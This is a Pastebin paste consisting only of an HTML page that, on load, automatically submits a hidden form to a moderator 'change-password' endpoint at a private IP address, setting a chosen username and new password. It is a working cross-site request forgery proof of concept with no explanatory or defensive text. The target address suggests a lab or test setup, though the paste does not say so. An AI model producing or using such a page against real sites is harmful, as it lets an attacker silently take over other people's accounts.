Advertisement
Guest User

Untitled

a guest
Jan 27th, 2015
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.75 KB | None | 0 0
  1. <html>
  2. <head>
  3. <script type="text/javascript">
  4. function autosubmit() {
  5. document.getElementById('ChangeSubmit').submit();
  6. }
  7. </script>
  8. </head>
  9. <body onLoad="autosubmit()">
  10. <form method="POST" action="http://10.0.0.32/moderator/change-password" id="ChangeSubmit">
  11. <input type="hidden" name="username" value="littlebobbytables" />
  12. <input type="hidden" name="new_password" value="maleus" />
  13. <input type="hidden" name="post" value="change-password" />
  14. <input type="submit" value="submit"/>
  15. </form>
  16. </body>
  17. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement